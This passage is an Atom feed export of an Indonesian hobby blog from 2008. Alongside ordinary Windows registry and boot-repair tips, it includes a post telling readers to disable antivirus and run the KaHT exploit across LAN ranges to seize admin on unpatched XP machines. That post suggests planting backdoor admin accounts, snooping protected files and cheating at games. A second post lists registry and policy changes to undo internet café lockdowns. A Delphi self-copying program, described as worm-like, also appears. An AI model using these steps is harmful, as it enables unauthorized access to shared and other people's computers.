Helvetica;font-size:85%;"&gt;Dari                                    menu Edit, klik Find.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Tuliskan                                    ShellNew, klik OK.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Setelah                                    itu Anda bisa menghapus subkey ShellNew yang                                    ditemukan oleh registry editor tersebut.&lt;/span&gt;                                  &lt;/li&gt;&lt;/ol&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-2766920410737891040?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/2766920410737891040/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=2766920410737891040' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2766920410737891040'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2766920410737891040'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/tutorial-registry.html' title='Tutorial Registry:'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-6183828786692910467</id><published>2008-03-29T09:14:00.001-07:00</published><updated>2008-03-31T20:21:00.587-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Mendapatkan Akses Admin di Windows XP</title><content type='html'>Terkadang dalam suatu warnet atau Lab atau bahkan kost. yang menggunakan  WIndows XP, biasanya pengguna diberikan akses guest atau limited account. Untuk  ngeburn CD atau klo mo nginstall program kita ngga akan bisa, karena aksesnya  bukan admin. Kadang-kadang ngeselin juga klo kayak gitu, jadi ngga bisa  ngapa-ngapain, Burn CD ga bisa, jalanin program ga bisa, pokoknya terbatas  banget :(...&lt;br /&gt;&lt;p&gt;&lt;br /&gt;gue mo ngasih tips gimana caranya dapetin akses admin yang  memanfaatkan kelemahan di Windows XP. Mungkin yg master dah pada tau tips ini,  tapi kan ngga semuanya master ;p... gue cuma mo bagi-bagi ilmu aja, siapa tau  ada gunanya. Tapi penulis ngga bertanggung jawab klo ada yang menggunakan untuk  hal-hal yang kurang bertanggung jawab, tutorial ini cuman untuk iseng-iseng aja,  he...&lt;br /&gt;&lt;br /&gt;Apa aja yang dibutuhin ?&lt;br /&gt;1. Komputer??&lt;br /&gt;2. Hoki, karena  cuman WinXP yg blm di Update aja (ato yg masih Vulner yg bisa diakses)&lt;br /&gt;3.  Uang, buat jajan n kewarnet (atau klo mau, bisa ngehack bilingnya, bisa ga pake  uang kan... tp bisa2 lo ketangkep)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Langkan pertama lo butuh program  exloit &lt;a href="http://www.securityfocus.com/data/vulnerabilities/exploits/KaHT_public.tar.gz"&gt;KaHT  &lt;/a&gt;yg dibuat oleh Kralor, KaHT tuh bisa 'NyeCan' beberapa Host, trus dicari  mana yg 'Vulner', n jalanin exploit di Host yg Vulner itu. Klo Linknya ga bisa,  coba Googling aja, banyak ko, atau klo msh g dpt juga email aja ke gue! klo dah  dapet, trus jalanin cmd lewat Run (Start &gt; Run &gt; cmd). Sebelumnya jangan  lupa untuk men-disable antivirus, karena kaht dikenali sebagai trojan. Misalkan  program kaht ada di drive C, folder kaht, maka pertintahnya sbb:&lt;br /&gt; &lt;/p&gt;&lt;p&gt;C:\kaht&gt;kaht 127.0.0.0 127.0.0.1  &lt;/p&gt;&lt;p&gt; --&gt; artinya scan Ip dari 127.0.0.0 sampai 127.0.0.1 (127.0.0.1 adalah IP  untuk Loopback, artinya kaht melakukan scanning untuk komputer itu  sendiri)&lt;br /&gt;&lt;br /&gt;Bisa juga untuk Scanning jaringan tertentu misalnya&lt;br /&gt;&lt;br /&gt;kaht  192.168.0.0 192.168.0.100&lt;br /&gt;&lt;br /&gt;Klo berhasil, lo bakal dapet akses admin..  &lt;/p&gt;&lt;p&gt;C:\Windows\system32&gt;  &lt;/p&gt;&lt;p&gt;coba check IP nya (ipconfig), apa ini komputer kita ???&lt;br /&gt;&lt;br /&gt;TaRaa....  yup, 'Admin Under Control' hehe... dapet deh akses admin :D&lt;br /&gt;Klo dah gini lo  bisa ngapain aja lewat komputer itu. Mo, ngeBurn CD, mo liat-liat file yg di  'protect' admin (siapa tau aja ada file2 yg menarik), mo buat user dgn akses  admin, atau buat Backdoor biar klo Login usernya punya akses admin.... Atau lo  bisa ngisengin temen lo yang satu jaringan (LAN), bisa juga curangin waktu maen  game di jaringan... hehe.. kan seru tuh!!&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-6183828786692910467?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/6183828786692910467/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=6183828786692910467' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6183828786692910467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6183828786692910467'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/mendapatkan-akses-admin-di-windows-xp.html' title='Mendapatkan Akses Admin di Windows XP'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-8723958196394939485</id><published>2008-03-29T09:03:00.000-07:00</published><updated>2008-03-31T20:22:08.524-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Mengembalikan Boot Manager Windows XP</title><content type='html'>Dalam satu komputer yang terdapat  lebih dari satu OS (Operating System), biasanya terdapat boot manager untuk  memilih OS yang akan digunakan. Untuk Komputer yang terdiri dari Windows 98/Me  dengan windows XP, terdapat Boot manager yang akan memberi pilihan OS yang akan  dipilih. Bagi orang yang sering gonta-ganti OS, hal ini menjadi masalah keitka  Boot Manager tidak berjalan dengan baik dan tidak dapat masuk ke Windows XP.  Atau jika ingin menginstall Windows 98 tanpa mau kehilangan XP (Instalasi  Windows 98 akan mengakibatkan tidak dapat boot ke Windows XP). Berikut adalah  cara yang dapat digunakan untuk menginstall Boot Manager agar dapat boot ke  windwos XP. &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt; &lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt;Boot computer menggunakan CD  Installer Windows XP (seperti ketika install Windows XP). Setelah proses  inisiasi, pilih (R) Recovery. Setelah itu, akan diminta password Administrator.  Setelah berhasil, maka akan muncul prompt (C:\Windows&gt;). Setelah itu ketikkan  perintah :&lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt; &lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt;&lt;span style="color: rgb(68, 107, 155);"&gt;fixmbr&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt;&lt;span style="color: rgb(68, 107, 155);"&gt;bootcfg  /rebuild&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt; &lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt;Setelah itu keluar dengan  menggunakan perintah &lt;span style="color: rgb(68, 107, 155);"&gt;exit &lt;/span&gt;. &lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt;Reboot kembali komputer anda.  Boot Manager akan kembali seperti semula&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-8723958196394939485?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/8723958196394939485/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=8723958196394939485' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8723958196394939485'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8723958196394939485'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/mengembalikan-boot-manager-windows-xp.html' title='Mengembalikan Boot Manager Windows XP'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-5914421474014799754</id><published>2008-03-29T07:28:00.000-07:00</published><updated>2008-03-29T07:42:57.367-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>tutorial Registry I</title><content type='html'>&lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Windows                                  merupakan sistem operasi untuk PC yang paling                                  populer saat ini, mulai dari Windows 95, 98, NT                                  dan yang baru saja diluncurkan yaitu Windows 2000                                  dan Windows Millenium. Salah satu keunggulan Windows                                  adalah kemudahan dalam penggunaannya. Misalnya                                  kemudahan mulai dari install, konfigurasi sampai                                  dengan adanya feature plug and play untuk hardware.&lt;/span&gt;&lt;/p&gt;                               &lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;                                  Tentunya semua konfigurasi dan setting tersebut                                  disimpan dalam sistem operasi, dan untuk menyimpan                                  informasi berbagai setting dan konfigurasi, Windows                                  menggunakan registry. Registry merupakan database                                  yang digunakan untuk menyimpan semua setting dan                                  informasi hardware, software dan berbagai preferences                                  untuk Windows 32 bit, termasuk Window 95, 98,                                  NT, Millenium dan 2000. Salah satu contohnya adalah                                  misalnya seseorang mengganti assosiasi file atau                                  menginstall program, maka perubahan setting tersebut                                  akan dituliskan pada registry. Contoh lainnya                                  adalah mendisable Display Properties, menyembunyikan                                  berbagai menu pada Menu Start. &lt;/span&gt;&lt;/p&gt;                               &lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Selain                                  sebagai tempat untuk menyimpan informasi sistem                                  operasi Windows sendiri, registry juga digunakan                                  sebagai tempat untuk menyimpan berbagai informasi                                  setting dan konfigurasi pada aplikasi atau program.                                  Misalnya WinZip menggunakan registry untuk menyimpan                                  informasi toolbar, aplikasi untuk membuka file                                  (viewer), user name, serial number, dan lain-lain.                                  &lt;/span&gt;&lt;/p&gt;                               &lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Registry                                  diletakkan pada dua buah hidden file yaitu user.dat                                  dan system.dat yang terletak pada directory Windows                                  untuk Win 95/98/Me dan pada directory Windows/System32/Config                                  untuk Windows NT. Selain menggunakan registry                                  (system.dat dan user.dat), Windows juga menyimpan                                  informasi setting tertentu pada file msdos.sys,                                  system.ini dan win.ini.&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-5914421474014799754?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/5914421474014799754/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=5914421474014799754' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/5914421474014799754'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/5914421474014799754'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/tutorial-registry-i.html' title='tutorial Registry I'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-6969141645839349302</id><published>2008-03-28T00:06:00.000-07:00</published><updated>2008-03-28T00:20:12.250-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Membuat Program yang dapat mengcopy dirinya sendiri</title><content type='html'>&lt;p style="margin: 0cm 7.5pt 0.0001pt; text-align: center; line-height: 200%;" align="center"&gt;&lt;b&gt;&lt;span style="font-size: 9pt; line-height: 200%; font-family: &amp;quot;Courier New&amp;quot;;"&gt;MEMBUAT PROGRAM YANG DAPAT MENGCOPY DIRINYA OTOMATIS&lt;/span&gt;&lt;/b&gt;  &lt;/p&gt; &lt;p style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="font-size: 9pt; line-height: 200%; font-family: &amp;quot;Courier New&amp;quot;;"&gt;Source code program dalam DELPHI. Program ini akan mengcopy dirinya otomatis ke tempat yang dinginkan.. yeah mirip-mirip worm gitu deech.. ;) Thanks to CodeMaker .. Great work man ;)&lt;/span&gt;&lt;/p&gt;   &lt;p style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="font-size: 9pt; line-height: 200%; font-family: &amp;quot;Courier New&amp;quot;;"&gt;   &lt;/span&gt;&lt;/p&gt; &lt;p&gt;  &lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;var&lt;br /&gt;Form1: TForm1;&lt;br /&gt;ExeString: String;&lt;br /&gt;&lt;br /&gt;implementation&lt;br /&gt;&lt;br /&gt;{$R *.DFM}&lt;br /&gt;///////////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;procedure Extract(A,B: String;Var C,D: String);&lt;br /&gt;Var&lt;br /&gt;E,F: Integer;&lt;br /&gt;begin&lt;br /&gt;if Pos(uppercase(A),C) &gt; 0 then&lt;br /&gt;begin&lt;br /&gt;E := Pos(uppercase(A),C)+length(A);&lt;br /&gt;F := Pos(uppercase(B),C);&lt;br /&gt;D := Copy(C,E,F-E);&lt;br /&gt;end;&lt;br /&gt;end;&lt;br /&gt;////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;procedure Exe2String(var A:String);&lt;br /&gt;Var&lt;br /&gt;ExeStream: TFileStream;&lt;br /&gt;MyStream: TMemoryStream;&lt;br /&gt;begin&lt;br /&gt;ExeStream:=TFileStream.Create(Application.ExeName,fmOpenRead or&lt;br /&gt;fmShareDenyNone);&lt;br /&gt;Try&lt;br /&gt;SetLength(A, ExeStream.Size);&lt;br /&gt;ExeStream.ReadBuffer(Pointer(A)^, ExeStream.Size);&lt;br /&gt;Finally&lt;br /&gt;ExeStream.Free;&lt;br /&gt;end;&lt;br /&gt;end;&lt;br /&gt;///////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;procedure Delay(ms : longint);&lt;br /&gt;var&lt;br /&gt;TheTime : LongInt;&lt;br /&gt;begin&lt;br /&gt;TheTime := GetTickCount + ms;&lt;br /&gt;while GetTickCount &lt; TheTime do&lt;br /&gt;Application.ProcessMessages;&lt;br /&gt;end;&lt;br /&gt;//////////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;////////////////////////////////////////////////////////////////////////////////&lt;br /&gt;procedure TForm1.FormCreate(Sender: TObject);&lt;br /&gt;Var&lt;br /&gt;MyStream: TMemoryStream;&lt;br /&gt;name,C,Temp: String;&lt;br /&gt;D,E: integer;&lt;br /&gt;begin&lt;br /&gt;exe2String(ExeString);////////////////////////////Get entire exe file from HD&lt;br /&gt;//and store in global variable&lt;br /&gt;//ExeString.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if pos(uppercase('soname'),exestring) &gt; 0 then //Check if exe contains a&lt;br /&gt;begin //users name already&lt;br /&gt;and if&lt;br /&gt;delay(500); //it does then see if&lt;br /&gt;the&lt;br /&gt;if pos('_clone',application.exename) = 0 then //running exe is a temporary&lt;br /&gt;begin //clone program.. if&lt;br /&gt;it is&lt;br /&gt;not&lt;br /&gt;name := application.exename; //a clone then attempt to delete&lt;br /&gt;Insert('_clone',name,(length(name)-3)); //any clone that may be in the&lt;br /&gt;deletefile(name); //applications directory. This&lt;br /&gt;end; //ensures that no clone will&lt;br /&gt;//ever remain after exe has&lt;br /&gt;//been customized.....&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;//////////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;edit1.visible := false; ///////////////////////It has been determined that&lt;br /&gt;form1.color := $00c6aa84; //the running exe has already been&lt;br /&gt;form1.height := 300; //customized..so alter the exe's&lt;br /&gt;//appearance to reflect that fact&lt;br /&gt;//This is where you put any setup code you want&lt;br /&gt;//to run when it has been determined that the exe&lt;br /&gt;//has ALREADY been modified! Code to check for a&lt;br /&gt;//valid usename+key,to alter the exe's appearance&lt;br /&gt;//or whatever you want to do to change the way the&lt;br /&gt;//now modified prog is to act should be done HERE!end;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;//////////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;//The code below runs IF it is determined that the currently running exe is&lt;br /&gt;//a temporary clone program..... this code will delete the original exe file&lt;br /&gt;//from the HD and then save a new copy of itself to the HD with the original&lt;br /&gt;//exe name...DO NOT REMOVE THE delay(500) line! The program will fail sometimes&lt;br /&gt;//if you do! Since the currently running exe is a clone that means it already&lt;br /&gt;//has been modified and in fact is identical to the final exe that it is saving&lt;br /&gt;//to disk with the original name... as soon as the new exe is saved to disk&lt;br /&gt;//this code runs it...then immediately terminates itself .. the clone commits&lt;br /&gt;//hari kiri :-) and since every time a customized exe starts up it attempts&lt;br /&gt;//to delete it's clone from the current directory this clones remaining life&lt;br /&gt;//on disk is limited to 1/2 second......&lt;br /&gt;if pos('_CLONE',uppercase(application.exename)) &lt;&gt; 0 then&lt;br /&gt;begin&lt;br /&gt;delay(500);&lt;br /&gt;name := application.exename;&lt;br /&gt;Delete(name,length(name)-9,6);&lt;br /&gt;if deletefile(name) then&lt;br /&gt;begin&lt;br /&gt;MyStream := TMemoryStream.Create;&lt;br /&gt;try&lt;br /&gt;MyStream.WriteBuffer(Pointer(ExeString)^, Length(ExeString));&lt;br /&gt;MyStream.savetofile(name);&lt;br /&gt;finally&lt;br /&gt;MyStream.Free;&lt;br /&gt;ShellExecute(Handle, 'open',&lt;br /&gt;pchar(name), nil, nil, SW_SHOWNORMAL);&lt;br /&gt;application.terminate&lt;br /&gt;end;&lt;br /&gt;end&lt;br /&gt;else showmessage(name+' not found');//this displays if it was determined that&lt;br /&gt;//the running exe is a clone but for some&lt;br /&gt;//crazy reason the original exe file is&lt;br /&gt;//not found in the current directory :-(&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;end;&lt;br /&gt;&lt;br /&gt;//The code below extracts the user name string from the exe file&lt;br /&gt;//and displays it as a caption...but you could retrieve whatever&lt;br /&gt;//data you had stored and do whatever you want with it :-)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if Pos(uppercase('soname'),exestring) &gt; 0 then //Extract Name string&lt;br /&gt;begin //from exe file and&lt;br /&gt;Extract('soname','eoname',ExeString,Temp); //display as the button&lt;br /&gt;SpeedButton1.Caption := 'Program is Registered to '+Temp;//caption :-)&lt;br /&gt;end;&lt;br /&gt;end;&lt;br /&gt;////////////////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;//The code in the SpeedButton event handler below modifies the string held in&lt;br /&gt;//the global variable ExeString...this string contains the entire exe file as&lt;br /&gt;//string data...it modifies ExeString by adding data to it's end... the data is&lt;br /&gt;//held between the demarcators 'SONAME' and 'EONAME' these mark off the data&lt;br /&gt;//and make it possible to find it later and extract it from the running exe&lt;br /&gt;//After ExeString is modified it is saved to a new file in the current directory&lt;br /&gt;//with the exe's name plus '_clone' so if the exe name is myprog.exe the clone&lt;br /&gt;//that is saved will be myprog_clone.exe... as soon as the clone exe is saved&lt;br /&gt;//to disk the program runs it and then terminates itself :-)&lt;br /&gt;//The reason uppercase('soname') is used is because the program would find the&lt;br /&gt;//data 'SONAME' at the wrong point in the exe file if you did not do it this way&lt;br /&gt;//ditto for uppercase('eoname') this is an IMPORTANT POINT!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;procedure TForm1.SpeedButton1Click(Sender: TObject);&lt;br /&gt;var&lt;br /&gt;MyStream: TMemoryStream;&lt;br /&gt;MyFile,newname: string;&lt;br /&gt;A,B: Integer;&lt;br /&gt;begin&lt;br /&gt;If Speedbutton1.Caption &lt;&gt; 'Enter Your Name Below Then Click Here To&lt;br /&gt;Customize Exe'then&lt;br /&gt;begin&lt;br /&gt;exit;&lt;br /&gt;end;&lt;br /&gt;begin&lt;br /&gt;if edit1.text = '' then&lt;br /&gt;begin&lt;br /&gt;showmessage('Please enter a name in the Edit Box!');&lt;br /&gt;exit;&lt;br /&gt;end;&lt;br /&gt;MyStream := TMemoryStream.Create;&lt;br /&gt;try&lt;br /&gt;//in line below you tack on the new data :-)&lt;br /&gt;ExeString := ExeString + uppercase('soname') + Edit1.Text&lt;br /&gt;+ uppercase('eoname');&lt;br /&gt;&lt;br /&gt;MyStream.Clear;&lt;br /&gt;MyStream.WriteBuffer(Pointer(ExeString)^,&lt;br /&gt;Length(ExeString));//string&lt;br /&gt;2 stream&lt;br /&gt;&lt;br /&gt;newname := application.exename; //change name to make it a clone!&lt;br /&gt;Insert('_clone',newname,length(application.exename)-3);&lt;br /&gt;&lt;br /&gt;MyStream.savetofile(newname);//save stream to file as a temporary&lt;br /&gt;clone!&lt;br /&gt;finally&lt;br /&gt;MyStream.Free;&lt;br /&gt;end;&lt;br /&gt;&lt;br /&gt;ShellExecute(Handle, 'open', //run the clone you just&lt;br /&gt;saved!&lt;br /&gt;pchar(newname), nil, nil, SW_SHOWNORMAL);&lt;br /&gt;&lt;br /&gt;application.terminate; //die little proggie&lt;br /&gt;die! :-)&lt;br /&gt;end;&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-6969141645839349302?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/6969141645839349302/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=6969141645839349302' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6969141645839349302'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6969141645839349302'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/membuat-program-yang-dapat-mengcopy.html' title='Membuat Program yang dapat mengcopy dirinya sendiri'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-3520559210466233050</id><published>2008-03-26T22:26:00.000-07:00</published><updated>2008-03-31T20:24:26.057-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Billing Internet</title><content type='html'>&lt;span style=""&gt;Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka,&lt;br /&gt;klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan... apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer:&lt;br /&gt;Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara&lt;br /&gt;tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba...&lt;br /&gt;Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya...&lt;br /&gt;&lt;/span&gt;&lt;span style=""&gt;==&gt; Pertama Buka GPEdit.msc dulu&lt;br /&gt;&lt;/span&gt;&lt;span style=""&gt;1. Jika Klik Kanan di Desktop tidak bisa&lt;br /&gt;Masuk Ke GPEdit.msc&lt;br /&gt;Masuk ke [User Configuration/Administrative Templates/Desktop]&lt;br /&gt;- Disable (Hide and disable all items on the desktop)&lt;br /&gt;&lt;br /&gt;Jika MyComputer tidak ada&lt;br /&gt;- Disable (Remove My Computer icon on the Desktop)&lt;br /&gt;&lt;br /&gt;2. Jika Ingin mengubah properties pada taskbar start menu&lt;br /&gt;masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar]&lt;br /&gt;- Disable (Prevent changes to Taskbar and Start Menu Settings)&lt;br /&gt;&lt;br /&gt;Jika Menu Run tidak muncul&lt;br /&gt;- Disable (Remove Run menu from Start Menu)&lt;br /&gt;&lt;br /&gt;Jika menu pada taskbar saat klik kanan tidak muncul&lt;br /&gt;- Disable (Remove access to the context menus for the taskbar)&lt;br /&gt;3. Apabila Control Panel tidak bisa di akses&lt;br /&gt;Masuk ke [User Configuration/Administrative Templates/Control Panel]&lt;br /&gt;- Disable (Prohibit access to the Control Panel)&lt;br /&gt;&lt;br /&gt;4. Jika Command Prompt tidak bisa di akses&lt;br /&gt;Masuk ke [User Configuration/Administrative Templates/System]&lt;br /&gt;- Disable (Prevent access to the command prompt)&lt;br /&gt;&lt;br /&gt;Jika Registry Editor tidak bisa di akses&lt;br /&gt;- Disable (Prevent access to registry editing tools)&lt;br /&gt;&lt;br /&gt;5. Jika Task Manager tidak bisa di akses&lt;br /&gt;Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options]&lt;br /&gt;- Disable (Remove Task Manager)&lt;br /&gt;&lt;br /&gt;6. Jika Folder Options pada Windows Explorer tidak muncul&lt;br /&gt;Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer]&lt;br /&gt;- Disable (Remove these Folder Options menu item from the Tools menu)&lt;br /&gt;&lt;br /&gt;Jika Windows Key tidak berfungsi&lt;br /&gt;- Disable (Turn off Windows+X hotkeys)&lt;br /&gt;&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=""&gt;==&gt; Setelah GPEdit.msc terbuka baru buka Registry Tools&lt;br /&gt;caranya:&lt;br /&gt;C:\Windows\System32\regedit.exe &lt;-- double Click --- atau --- C:\Windows\regedit.exe &lt;-- double Click  &lt;/span&gt;&lt;span style=""&gt;Regedit4&lt;br /&gt;&lt;br /&gt;[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD]&lt;br /&gt;"loadvxd"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]&lt;br /&gt;"NoDrives"=dword:00000000&lt;br /&gt;"LinkResolveIgnoreLinkInfo"=dword:00000000&lt;br /&gt;"NoFolderOptions"=dword:00000000&lt;br /&gt;"ClearRecentDocsOnExit"=dword:00000000&lt;br /&gt;"NoTrayContextMenu"=dword:00000000&lt;br /&gt;"EnforceShellExtensionSecurity"=dword:00000000&lt;br 